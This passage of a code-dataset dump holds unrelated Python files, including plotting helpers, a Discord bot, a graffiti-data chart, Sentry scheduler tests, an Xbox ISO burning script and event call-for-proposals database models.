dict=None, save: str=None) -> None:\n \"\"\" plots the precision-, recall- and F!-score for every class\n\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :param list f1_scores: list containing the f1-score of each class\n \"\"\"\n\n plt.style.use(\"bmh\")\n\n plt.bar(classes, true_positive_rates, color=\"lightslategray\", alpha=0.9, align=\"center\")\n plt.xticks(classes, rotation=50)\n # plt.xticklabels(classes, rotation=25)\n plt.title(\"true positive scores\")\n\n \"\"\"fig, axs = plt.subplots(1, 2)\n \n axs[0].bar(classes, true_positive_rates, color=\"lightslategray\", alpha=0.9, align=\"center\")\n axs[0].set_xticklabels(classes, rotation=75)\n axs[0].title.set_text(\"true positive scores\")\n\n axs[1].bar(classes, [np.mean(true_positive_rates) for _ in range(len(classes))], color=\"lightslategray\", alpha=0.9, align=\"center\")\n axs[1].set_xticklabels(classes, rotation=75)\n axs[1].title.set_text(\"desired true positive scores\")\n axs[1].set_ylim([0, 1.0])\"\"\"\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\n\n\ndef plot_weight_influence(pre_true_positive_rates: list, post_true_positive_rates: list, classes: dict=None, save: str=None) -> None:\n \"\"\" plots the precision-, recall- and F!-score for every class\n\n :param list precisions: list containing the precision of each class\n :param list recalls: list containing the recall of each class\n :param list f1_scores: list containing the f1-score of each class\n \"\"\"\n\n plt.style.use(\"bmh\")\n \n nrange = np.arange(len(classes))\n width = 0.35\n\n\n plt.bar(nrange - width, pre_true_positive_rates, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n plt.bar(nrange, post_true_positive_rates, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n plt.xticks(nrange, classes, rotation=25)\n # plt.xticklabels(classes, rotation=25)\n plt.title(\"true positive scores\")\n\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\n\n\n\"\"\"classes = {\"airplane\": 0, \"automobile\": 1, \"bird\": 2, \"cat\": 3, \"deer\": 4, \"dog\": 5, \"frog\": 6, \"horse\": 7, \"ship\": 8, \"truck\": 9}\ntrue_positive_rates = [0.8363273453093812, 0.9284294234592445, 0.7088846880907372, 0.6540755467196819, 0.7793522267206477, 0.7243589743589743, 0.8722943722943723, 0.8511066398390342, 0.854043392504931, 0.8899253731343284]\nplot_true_positive_rates(true_positive_rates, classes=list(classes.keys()))\"\"\"\n\n\n\n\n\n\"\"\"def plot_weight_influence(pre_scores: list, post_scores: list, classes: dict=None, save: str=None) -> None:\n\n pre_precisions, pre_recalls, pre_f1_scores = pre_scores\n post_precisions, post_recalls, post_f1_scores = post_scores\n\n plt.style.use(\"bmh\")\n\n fig, axs = plt.subplots(1, 3)\n \n nrange = np.arange(len(classes))\n width = 0.35\n\n\n axs[0].bar(nrange, pre_precisions, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[0].bar(nrange - width, post_precisions, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[0].set_xticks(nrange)\n axs[0].set_xticklabels(classes, rotation=25)\n axs[0].title.set_text(\"precision scores\")\n\n\n axs[1].bar(nrange, pre_recalls, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n 
axs[1].bar(nrange - width, post_recalls, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[1].set_xticks(nrange)\n axs[1].set_xticklabels(classes, rotation=25)\n axs[1].title.set_text(\"recall scores\")\n\n axs[2].bar(nrange, pre_f1_scores, color=\"steelblue\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[2].bar(nrange - width, post_f1_scores, color=\"orange\", width=(width - 0.05), alpha=0.9, align=\"center\")\n axs[2].set_xticks(nrange)\n axs[2].set_xticklabels(classes, rotation=25)\n axs[2].title.set_text(\"f1 scores\")\n\n if save != None:\n try:\n plt.savefig(save + \"/scores.png\")\n except Exception as e:\n print(\"\\ncouldn't save score plots!\")\n print(e)\n\n plt.show()\"\"\"","sub_path":"experiments/cnn-experiment/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"621627322","text":"from flask import Flask, render_template\r\nimport requestlaporan\r\n\r\n\r\napp = Flask(__name__, static_folder='app/static')\r\napp.static_folder = 'static'\r\n\r\n@app.route('/requestbaru')\r\ndef request():\r\n \r\n return render_template('requestLaporan.html')\r\n laporan = requestlaporan.RequestLaporan()\r\n\r\n\r\n\r\n\r\n #laporan.validasiSession()\r\n #hasil = laporan.requestLaporanBaru(.......................)\r\n\r\n\r\n#app.route('editlaporan'):\r\n# ........\r\n# .......\r\n# .......\r\n","sub_path":"app/TEST/msrequest.py","file_name":"msrequest.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"611565166","text":"#Imports\nimport discord\nfrom discord.ext import commands\nimport jeux\nimport asyncio\nimport configparser\n\n#Config file\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nbot_key = config.get(\"Bot\", \"key\") #bot's key\npcmd = config.get(\"Bot\", \"Command_Prefix\") #command s'Prefix\n\n#bot client\nClient = commands.Bot(command_prefix=pcmd) \nClient.remove_command('help')\n\n@Client.event\nasync def on_ready():\n print(\"Starting Bot!\")\n print(\"Bot Id = \" + Client.user.id)\n\n@Client.command()\nasync def ping():\n await Client.say(\"Pong!\")\n\n@Client.command()\nasync def help():\n await Client.say(\"Bot en Construction!\")\n\nClient.run(bot_key)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"429558538","text":"L = float(input('L ni kiriting : '))\n\nP = 3.14\n# R = aylananing radiusi L = 2 * P * R\nR = L / (2 * P)\n# S = ayalananing yuzasi\nS = P * (R **2)\n\nprint(R)\nprint(S)","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"406565538","text":"import os\nimport csv\nimport matplotlib.pyplot as plt\n\n# Original source of data:\n# https://data.cityofnewyork.us/api/views/gpwd-npar/rows.csv?accessType=DOWNLOAD\n# (accessed: 25th July, 2017)\n# Plus an interesting video about graffiti removal in New York City: \n# https://www.youtube.com/watch?v=jrPN3P1pSxU\ndatafile = os.path.dirname(__file__) + '/data/' + 'DSNY_Graffiti_Information.csv'\n\ngraffitis_by_borough = {'BRONX': 0, 'BROOKLYN': 0, 'MANHATTAN': 0, 'QUEENS': 0, 'STATEN ISLAND': 0}\n\nwith open(datafile, 'r') as csvfile:\n rd = csv.reader(csvfile, delimiter=',')\n for row in rd:\n if row[1] == 'BOROUGH':\n continue\n if row[8].find('Property cleaned.') == -1:\n continue\n dt = row[9].split('/')\n if dt[0] != '':\n if dt[2] == '2016' and (dt[0] == '10' or dt[0] == '11' or dt[0] == '12'):\n graffitis_by_borough[row[1]] += 1 \n \nlabels = graffitis_by_borough.keys()\nsizes = list(graffitis_by_borough.values())\n\nfig1, ax1 = plt.subplots()\nplt.title('NYC removed graffitis by boroughs, 4th quarter 2016')\nax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90)\nax1.axis('equal') \n\nplt.show()","sub_path":"dsnygraf1.py","file_name":"dsnygraf1.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"150029490","text":"#-*- coding: utf-8 -*-\n\nfrom db.db_conn import DBManager\nfrom sys import exit\nimport copy\nimport time\n\n\nclass ChartGenerator:\n def __init__(self, formatter=None):\n self.formatter = formatter\n\n def report_charts(self, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, chart_id):\n self._db = DBManager.get_query()\n if chart_id:\n self._db.Query(\"\"\"SELECT report_data_set_chart_id FROM report_data_set_chart\n WHERE element_id=%s AND report_data_set_chart_id = %s\"\"\", (element_id, chart_id))\n else:\n self._db.Query(\"\"\"SELECT report_data_set_chart_id FROM report_data_set_chart\n WHERE element_id=%s AND enabled_ind='Y'\"\"\", (element_id, ))\n for el in self._db.record:\n self.report_chart(el['report_data_set_chart_id'], element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, 'large')\n\n def _strip_total(self, data, bars_or_lines_created_for, index):\n stripped_data = data.copy()\n if bars_or_lines_created_for == 'column headers':\n rows_num = len(stripped_data[index]['rows'])\n if rows_num:\n total_cell = stripped_data[index]['rows'][rows_num - 1][0]['original_val']\n # do not remove TOTAL column if it is the only row besides label column\n if (\n (isinstance(total_cell, str) and total_cell == 'TOTAL') or \\\n (isinstance(total_cell, unicode) and total_cell == u'TOTAL')) and \\\n rows_num > 1:\n del(stripped_data[index]['rows'][rows_num - 1])\n else:\n col_num = len(stripped_data[index]['header'])\n total_cell = stripped_data[index]['header'][col_num - 1]['original_val']\n # do not remove TOTAL row if it is the only row besides label row\n if (\n (isinstance(total_cell, str) and total_cell == 'TOTAL') or \\\n (isinstance(total_cell, unicode) and total_cell == u'TOTAL')) and \\\n col_num > 1:\n del(stripped_data[index]['header'][col_num - 1])\n for i, v in enumerate(stripped_data[index]['rows']):\n del(stripped_data[index]['rows'][i][col_num - 1])\n return stripped_data\n\n def report_chart(self, chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, type):\n from report_chart import ReportChart\n self._db = DBManager.get_query()\n self._db.Query(\"\"\"SELECT report_data_set_chart_id, bars_or_lines_created_for, report_data_set_pivot_id, name\n FROM report_data_set_chart\n WHERE element_id=%s AND report_data_set_chart_id = %s\"\"\", (element_id, chart_id))\n chart = self._db.record[0]\n if chart['report_data_set_pivot_id']:\n index = chart['report_data_set_pivot_id']\n else:\n index = 0\n #if not data.has_key(index):\n if index not in data:\n raise Exception(\"There is no source data for chart %s (%s)\" % (chart['name'], chart_id))\n\n data_chart = self._strip_total(data, chart['bars_or_lines_created_for'], index)\n _report_chart = ReportChart(chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data_chart, jfile, type)\n _report_chart.generateChart()\n\n def report_thumbnail(self, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, chart_id):\n self.report_chart(chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, 'thumbnail')\n\n def report_preview(self, element_id, meas_time, segment_value_id, data_set_instance_id, data, jfile, chart_id):\n self.report_chart(chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, 'preview')\n\n def metric(self, metric_id, interval, data, jfile, type):\n from metric_chart import MetricChart\n metric_chart = MetricChart(metric_id, 
interval, data, jfile, type, self.formatter)\n return metric_chart.generate_chart()\n\n def metric_chart(self, metric_id, interval, data, jfile):\n return self.metric(metric_id, interval, data, jfile, 'large')\n\n def metric_preview(self, metric_id, interval, data, jfile):\n return self.metric(metric_id, interval, data, jfile, 'preview')\n\n def metric_thumbnail(self, metric_id, interval, data, jfile):\n return self.metric(metric_id, interval, data, jfile, 'thumbnail')\n","sub_path":"chart/chart_generator.py","file_name":"chart_generator.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"511960489","text":"from __future__ import absolute_import, print_function\n\nfrom datetime import timedelta\nfrom django.utils import timezone\nfrom mock import patch\n\nfrom sentry.models import ScheduledJob\nfrom sentry.testutils import TestCase\nfrom sentry.tasks.scheduler import enqueue_scheduled_jobs\n\n\nclass EnqueueScheduledJobsTest(TestCase):\n def test_does_not_schedule_future_job(self):\n sj = ScheduledJob.objects.create(\n name='sentry.tasks.enqueue_scheduled_jobs',\n payload={'foo': 'baz'},\n date_scheduled=timezone.now() + timedelta(days=1),\n )\n\n enqueue_scheduled_jobs()\n\n assert ScheduledJob.objects.filter(\n id=sj.id,\n ).exists()\n\n @patch('sentry.celery.app.send_task')\n def test_schedules_due_job(self, mock_send_task):\n sj = ScheduledJob.objects.create(\n name='sentry.tasks.enqueue_scheduled_jobs',\n payload={'foo': 'bar'},\n date_scheduled=timezone.now(),\n )\n\n enqueue_scheduled_jobs()\n\n assert not ScheduledJob.objects.filter(\n id=sj.id,\n ).exists()\n\n mock_send_task.assert_called_once_with(\n 'sentry.tasks.enqueue_scheduled_jobs',\n kwargs={'foo': 'bar'},\n )\n","sub_path":"tests/sentry/tasks/test_enqueue_scheduled_jobs.py","file_name":"test_enqueue_scheduled_jobs.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"391002882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nencoding = 'utf-8'\n\nimport os, sys, functions, wx\n\nprint(\"XGD-Burner 0.1 beta\")\nprint(\"Developer: DJYoshaBYD\")\n\nprint(\"Please choose the ISO you want to burn..\")\nINAME = raw_input()\nif INAME == \"\":\n print(\"You need to choose a type in the full path to the ISO you want to burn... Closing.\")\n sys.exit()\n\nprint(\"Have you run the ISO through ABGX360? y/n\")\nabg = raw_input()\nif abg == \"n\":\n print(\"You need to do that before we continue. Exiting...\")\n sys.exit()\n\nprint(\"Checking ISO for size/type\")\nDSIZE = os.path.getsize(INAME)\n\nif DSIZE > 8547991552:\n DTYPE=\"xgd3\"\n print(\"This is an XGD3 disc. Some games do not work when truncated. Do you want to truncate? y/n\")\n trunc = raw_input()\n if trunc == y:\n functions.truncate\n DTYPE=\"xgd3trunc\"\n elif trunc == n:\n print(\"The disc will not work if you are not running an Lite-On iHAS Burner\")\n print(\"Do you wish to continue? y/n\")\n ihas = raw_input()\n if ihas == n:\n print(\"Please try agai with iHAS burner or use truncate AT YOUR OWN RISK\")\n sys.exit()\nelif DSIZE < 8547991552:\n DTYPE=\"xgd2\"\n\nprint(\"Choose your DVD burner. You will need to put /dev/ in front of the drive name\")\nos.system(\"echo dmesg | egrep -i --color 'cdrom|dvd|cd/rw|writer'\")\nDVD = raw_input()\n\nprint(\"Everything looks good. Starting burn process...\")\nfunctions.burn()\n","sub_path":"lib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"527387519","text":"from datetime import datetime, timedelta\nfrom collections import namedtuple\nfrom dateutil.parser import parse as parse_date\nimport re\nfrom itertools import groupby\n\nfrom sqlalchemy import UniqueConstraint, func, select\nfrom sqlalchemy.orm import column_property\nfrom slugify import slugify_unicode\nfrom models import export_attr_counts, export_attr_edits, export_intervals, bucketise\n\nfrom main import db\nfrom .user import User\n\n# state: [allowed next state, ] pairs\nCFP_STATES = { 'edit': ['accepted', 'rejected', 'new'],\n 'new': ['accepted', 'rejected', 'checked', 'manual-review'],\n 'checked': ['accepted', 'rejected', 'anonymised', 'anon-blocked', 'edit'],\n 'rejected': ['accepted', 'rejected', 'edit'],\n 'cancelled': ['accepted', 'rejected', 'edit'],\n 'anonymised': ['accepted', 'rejected', 'reviewed', 'edit'],\n 'anon-blocked': ['accepted', 'rejected', 'reviewed', 'edit'],\n 'reviewed': ['accepted', 'rejected', 'edit'],\n 'manual-review': ['accepted', 'rejected', 'edit'],\n 'accepted': ['accepted', 'rejected', 'finished'],\n 'finished': ['rejected', 'finished'] }\n\n# Most of these states are the same they're kept distinct for semantic reasons\n# and because I'm lazy\nVOTE_STATES = {'new': ['voted', 'recused', 'blocked'],\n 'voted': ['resolved', 'stale'],\n 'recused': ['resolved', 'stale'],\n 'blocked': ['resolved', 'stale'],\n 'resolved': ['voted', 'recused', 'blocked'],\n 'stale': ['voted', 'recused', 'blocked'],\n }\n\n# Lengths for talks and workshops as displayed to the user\nLENGTH_OPTIONS = [('< 10 mins', \"Shorter than 10 minutes\"),\n ('10-25 mins', \"10-25 minutes\"),\n ('25-45 mins', \"25-45 minutes\"),\n ('> 45 mins', \"Longer than 45 minutes\")]\n\n# What we consider these as when scheduling\nROUGH_LENGTHS = {'> 45 mins': 60,\n '25-45 mins': 30,\n '10-25 mins': 20,\n '< 10 mins': 10\n }\n\n# These are the time periods speakers can select as being available in the form\nperiod = namedtuple('Period', 'start end')\nTIME_PERIODS = {\n 'fri_13_16': period(datetime(2018, 8, 31, 14, 0), datetime(2018, 8, 31, 16, 0)),\n 'fri_16_20': period(datetime(2018, 8, 31, 16, 0), datetime(2018, 8, 31, 20, 0)),\n 'sat_10_13': period(datetime(2018, 9, 1, 10, 0), datetime(2018, 9, 1, 13, 0)),\n 'sat_13_16': period(datetime(2018, 9, 1, 13, 0), datetime(2018, 9, 1, 16, 0)),\n 'sat_16_20': period(datetime(2018, 9, 1, 16, 0), datetime(2018, 9, 1, 20, 0)),\n 'sun_10_13': period(datetime(2018, 9, 2, 10, 0), datetime(2018, 9, 2, 13, 0)),\n 'sun_13_16': period(datetime(2018, 9, 2, 13, 0), datetime(2018, 9, 2, 16, 0)),\n 'sun_16_20': period(datetime(2018, 9, 2, 16, 0), datetime(2018, 9, 2, 20, 0)),\n}\n\n# We may also have other venues in the DB, but these are the ones to be\n# returned by default if there are none\nDEFAULT_VENUES = {\n 'talk': ['Stage A', 'Stage B', 'Stage C'],\n 'workshop': ['Workshop 1', 'Workshop 2'],\n 'youthworkshop': ['Workshop 3'],\n 'performance': ['Stage A'],\n 'installation': [],\n}\n\n# List of submission types which are manually reviewed rather than through\n# the anonymous review system.\nMANUAL_REVIEW_TYPES = ['youthworkshop', 'performance', 'installation']\n\n\nclass CfpStateException(Exception):\n pass\n\nclass InvalidVenueException(Exception):\n pass\n\n\nFavouriteProposal = db.Table('favourite_proposal', db.Model.metadata,\n db.Column('user_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),\n db.Column('proposal_id', db.Integer, db.ForeignKey('proposal.id'), primary_key=True),\n)\n\nclass Proposal(db.Model):\n 
__versioned__ = {'exclude': ['favourites']}\n __tablename__ = 'proposal'\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n anonymiser_id = db.Column(db.Integer, db.ForeignKey('user.id'), default=None)\n created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)\n modified = db.Column(db.DateTime, default=datetime.utcnow, nullable=False, onupdate=datetime.utcnow)\n state = db.Column(db.String, nullable=False, default='new')\n type = db.Column(db.String, nullable=False) # talk, workshop or installation\n\n # Core information\n title = db.Column(db.String, nullable=False)\n description = db.Column(db.String, nullable=False)\n requirements = db.Column(db.String)\n length = db.Column(db.String) # only used for talks and workshops\n notice_required = db.Column(db.String)\n\n # Flags\n needs_help = db.Column(db.Boolean, nullable=False, default=False)\n needs_money = db.Column(db.Boolean, nullable=False, default=False)\n one_day = db.Column(db.Boolean, nullable=False, default=False)\n has_rejected_email = db.Column(db.Boolean, nullable=False, default=False)\n\n # References to this table\n messages = db.relationship('CFPMessage', backref='proposal')\n votes = db.relationship('CFPVote', backref='proposal')\n favourites = db.relationship(User, secondary=FavouriteProposal, backref=db.backref('favourites'))\n\n # Convenience for individual objects. Use an outerjoin and groupby for more than a few records\n favourite_count = column_property(select([func.count(FavouriteProposal.c.proposal_id)]).where(\n FavouriteProposal.c.proposal_id == id,\n ), deferred=True)\n\n # Fields for finalised info\n published_names = db.Column(db.String)\n arrival_period = db.Column(db.String)\n departure_period = db.Column(db.String)\n telephone_number = db.Column(db.String)\n may_record = db.Column(db.Boolean)\n needs_laptop = db.Column(db.Boolean)\n available_times = db.Column(db.String)\n\n # Fields for scheduling\n allowed_venues = db.Column(db.String, nullable=True)\n allowed_times = db.Column(db.String, nullable=True)\n scheduled_duration = db.Column(db.Integer, nullable=True)\n scheduled_time = db.Column(db.DateTime, nullable=True)\n scheduled_venue_id = db.Column(db.Integer, db.ForeignKey('venue.id'))\n potential_time = db.Column(db.DateTime, nullable=True)\n potential_venue_id = db.Column(db.Integer, db.ForeignKey('venue.id'))\n\n scheduled_venue = db.relationship('Venue', backref='proposals', cascade='all',\n primaryjoin='Venue.id == Proposal.scheduled_venue_id')\n potential_venue = db.relationship('Venue',\n primaryjoin='Venue.id == Proposal.potential_venue_id')\n\n __mapper_args__ = {'polymorphic_on': type}\n\n @classmethod\n def get_export_data(cls):\n if cls.__name__ == 'Proposal':\n # Export stats for each proposal type separately\n return {}\n\n count_attrs = ['needs_help', 'needs_money', 'needs_laptop',\n 'one_day', 'notice_required', 'may_record', 'state']\n\n edits_attrs = ['title', 'description', 'requirements', 'length',\n 'notice_required', 'needs_help', 'needs_money', 'one_day',\n 'has_rejected_email', 'published_names', 'arrival_period',\n 'departure_period', 'telephone_number', 'may_record',\n 'needs_laptop', 'available_times',\n 'attendees', 'cost', 'size', 'funds',\n 'age_range', 'participant_equipment']\n\n proposals = cls.query.with_entities(\n cls.id, cls.title, cls.description,\n cls.favourite_count, # don't care about performance here\n cls.length, cls.notice_required, cls.needs_money,\n 
cls.available_times, cls.allowed_times,\n cls.arrival_period, cls.departure_period,\n cls.needs_laptop, cls.may_record,\n ).order_by(cls.id)\n\n if cls.__name__ == 'WorkshopProposal':\n proposals = proposals.add_columns(cls.attendees, cls.cost)\n elif cls.__name__ == 'InstallationProposal':\n proposals = proposals.add_columns(cls.size, cls.funds)\n elif cls.__name__ == 'YouthWorkshopProposal':\n proposals = proposals.add_columns(cls.attendees, cls.cost, cls.age_range, cls.participant_equipment)\n\n # Some unaccepted proposals have scheduling data, but we shouldn't need to keep that\n accepted_columns = (\n User.name, User.email, cls.published_names,\n cls.scheduled_time, cls.scheduled_duration, Venue.name,\n )\n accepted_proposals = proposals.filter(cls.state.in_(['accepted', 'finished'])) \\\n .outerjoin(cls.scheduled_venue) \\\n .join(cls.user) \\\n .add_columns(*accepted_columns)\n\n other_proposals = proposals.filter(~cls.state.in_(['accepted', 'finished']))\n\n user_favourites = cls.query.filter(cls.state.in_(['accepted', 'finished'])) \\\n .join(cls.favourites) \\\n .with_entities(User.id.label('user_id'), cls.id) \\\n .order_by(User.id)\n\n anon_favourites = []\n for user_id, proposals in groupby(user_favourites, lambda r: r.user_id):\n anon_favourites.append([p.id for p in proposals])\n anon_favourites.sort()\n\n public_columns = (\n cls.title, cls.description,\n cls.published_names.label('names'), cls.may_record,\n cls.scheduled_time, cls.scheduled_duration, Venue.name.label('venue'),\n )\n accepted_public = cls.query.filter(cls.state.in_(['accepted', 'finished'])) \\\n .outerjoin(cls.scheduled_venue) \\\n .with_entities(*public_columns)\n\n favourite_counts = [p.favourite_count for p in proposals]\n\n data = {\n 'private': {\n 'proposals': {\n 'accepted_proposals': accepted_proposals,\n 'other_proposals': other_proposals,\n },\n 'favourites': anon_favourites,\n },\n 'public': {\n 'proposals': {\n 'counts': export_attr_counts(cls, count_attrs),\n 'edits': export_attr_edits(cls, edits_attrs),\n 'accepted': accepted_public,\n },\n 'favourites': {\n 'counts': bucketise(favourite_counts, [0, 1, 10, 20, 30, 40, 50, 100, 200]),\n },\n },\n 'tables': ['proposal', 'proposal_version', 'favourite_proposal', 'favourite_proposal_version'],\n }\n data['public']['proposals']['counts']['created_week'] = export_intervals(cls.query, cls.created, 'week', 'YYYY-MM-DD')\n\n return data\n\n def get_user_vote(self, user):\n # there can't be more than one vote per user per proposal\n return CFPVote.query.filter_by(proposal_id=self.id, user_id=user.id)\\\n .first()\n\n def set_state(self, state):\n state = state.lower()\n if state not in CFP_STATES:\n raise CfpStateException('\"%s\" is not a valid state' % state)\n\n if state not in CFP_STATES[self.state]:\n raise CfpStateException('\"%s->%s\" is not a valid transition' % (self.state, state))\n\n self.state = state\n\n def get_unread_vote_note_count(self):\n return len([v for v in self.votes if not v.has_been_read])\n\n def get_total_note_count(self):\n return len([v for v in self.votes if v.note and len(v.note) > 0])\n\n def get_unread_messages(self, user):\n return [m for m in self.messages if (not m.has_been_read and\n m.is_user_recipient(user))]\n\n def get_unread_count(self, user):\n return len(self.get_unread_messages(user))\n\n def mark_messages_read(self, user):\n messages = self.get_unread_messages(user)\n for msg in messages:\n msg.has_been_read = True\n db.session.commit()\n return len(messages)\n\n def has_ticket(self):\n \" Does the 
submitter have a ticket? \"\n admission_tickets = len(list(self.user.get_owned_tickets(paid=True, type='admission_ticket')))\n return admission_tickets > 0 or self.user.will_have_ticket\n\n def get_allowed_venues(self):\n if self.allowed_venues:\n venue_names = [ v.strip() for v in self.allowed_venues.split(',') ]\n else:\n venue_names = DEFAULT_VENUES[self.type]\n\n found = Venue.query.filter(Venue.name.in_(venue_names)).all()\n # If we didn't actually find all the venues we're using, bail hard\n if len(found) != len(venue_names):\n raise InvalidVenueException(\"Invalid Venue in allowed_venues!\")\n\n return found\n\n def get_allowed_venues_serialised(self):\n return ','.join([ v.name for v in self.get_allowed_venues() ])\n\n # Reduces the time periods to the smallest contiguous set we can\n def make_periods_contiguous(self, time_periods):\n if not time_periods:\n return []\n\n time_periods.sort(key=lambda x: x.start)\n contiguous_periods = [time_periods.pop(0)]\n for time_period in time_periods:\n if time_period.start <= contiguous_periods[-1].end and\\\n contiguous_periods[-1].end < time_period.end:\n contiguous_periods[-1] = period(contiguous_periods[-1].start, time_period.end)\n continue\n\n contiguous_periods.append(time_period)\n return contiguous_periods\n\n def get_allowed_time_periods(self):\n time_periods = []\n\n if self.allowed_times:\n for p in self.allowed_times.split('\\n'):\n if p:\n start, end = p.split(' > ')\n time_periods.append(\n period(\n parse_date(start),\n parse_date(end),\n )\n )\n\n # If we've not overridden it, use the user-specified periods\n if not time_periods and self.available_times:\n for p in self.available_times.split(','):\n if p:\n time_periods.append(TIME_PERIODS[p.strip()])\n return self.make_periods_contiguous(time_periods)\n\n def get_allowed_time_periods_serialised(self):\n return '\\n'.join([ \"%s > %s\" % (v.start, v.end) for v in self.get_allowed_time_periods() ])\n\n def get_allowed_time_periods_with_default(self):\n allowed_time_periods = self.get_allowed_time_periods()\n if not allowed_time_periods:\n allowed_time_periods = list(TIME_PERIODS.values())\n return self.make_periods_contiguous(allowed_time_periods)\n\n @property\n def end_date(self):\n start = self.scheduled_time\n duration = self.scheduled_duration\n if start and duration:\n return start + timedelta(minutes=int(duration))\n return None\n\n @property\n def slug(self):\n slug = slugify_unicode(self.title).lower()\n if len(slug) > 60:\n words = re.split(' +|[,.;:!?]+', self.title)\n break_words = ['and', 'which', 'with', 'without', 'for', '-', '']\n\n for i, word in reversed(list(enumerate(words))):\n new_slug = slugify_unicode(' '.join(words[:i])).lower()\n if word in break_words:\n if len(new_slug) > 10 and not len(new_slug) > 60:\n slug = new_slug\n break\n\n elif len(slug) > 60 and len(new_slug) > 10:\n slug = new_slug\n\n if len(slug) > 60:\n slug = slug[:60] + '-'\n\n return slug\n\n @property\n def latlon(self):\n if self.scheduled_venue.lat and self.scheduled_venue.lon:\n return [self.scheduled_venue.lat, self.scheduled_venue.lon]\n return None\n\n @property\n def map_link(self):\n latlon = self.latlon\n if latlon:\n return 'https://map.emfcamp.org/?lat=%s&lon=%s&title=%s#19/%s/%s' % (latlon[0], latlon[1], self.scheduled_venue.name, latlon[0], latlon[1])\n return None\n\nclass PerformanceProposal(Proposal):\n __mapper_args__ = {'polymorphic_identity': 'performance'}\n human_type = 'performance'\n\n\nclass TalkProposal(Proposal):\n __mapper_args__ = 
{'polymorphic_identity': 'talk'}\n human_type = 'talk'\n\n\nclass WorkshopProposal(Proposal):\n __mapper_args__ = {'polymorphic_identity': 'workshop'}\n human_type = 'workshop'\n attendees = db.Column(db.String)\n cost = db.Column(db.String)\n age_range = db.Column(db.String)\n participant_equipment = db.Column(db.String)\n\n\nclass YouthWorkshopProposal(WorkshopProposal):\n __mapper_args__ = {'polymorphic_identity': 'youthworkshop'}\n human_type = 'youth workshop'\n valid_dbs = db.Column(db.Boolean, nullable=False, default=False)\n\n\nclass InstallationProposal(Proposal):\n __mapper_args__ = {'polymorphic_identity': 'installation'}\n human_type = 'installation'\n size = db.Column(db.String)\n funds = db.Column(db.String, nullable=True)\n\n\nclass CFPMessage(db.Model):\n __tablename__ = 'cfp_message'\n id = db.Column(db.Integer, primary_key=True)\n created = db.Column(db.DateTime, default=datetime.utcnow)\n from_user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n proposal_id = db.Column(db.Integer, db.ForeignKey('proposal.id'), nullable=False)\n\n message = db.Column(db.String, nullable=False)\n # Flags\n is_to_admin = db.Column(db.Boolean)\n has_been_read = db.Column(db.Boolean, default=False)\n\n def is_user_recipient(self, user):\n \"\"\"\n Because we want messages from proposers to be visible to all admin\n we need to infer the 'to' portion of the email, either it is\n to the proposer (from admin) or to admin (& from the proposer).\n\n Obviously if the proposer is also an admin this doesn't really work\n but equally they should know where to ask.\n \"\"\"\n is_user_admin = user.has_permission('cfp_admin')\n is_user_proposer = user.id == self.proposal.user_id\n\n if is_user_proposer and not self.is_to_admin:\n return True\n\n if is_user_admin and self.is_to_admin:\n return True\n\n return False\n\n @classmethod\n def get_export_data(cls):\n count_attrs = ['has_been_read']\n\n message_contents = cls.query.join(User).with_entities(\n cls.proposal_id, User.email.label('from_user_email'), User.name.label('from_user_name'),\n cls.is_to_admin, cls.has_been_read, cls.message,\n ).order_by(cls.id)\n\n data = {\n 'private': {\n 'message': message_contents,\n },\n 'public': {\n 'messages': {\n 'counts': export_attr_counts(cls, count_attrs),\n },\n },\n 'tables': ['cfp_message', 'cfp_message_version'],\n }\n data['public']['messages']['counts']['created_day'] = export_intervals(cls.query, cls.created, 'day', 'YYYY-MM-DD')\n\n return 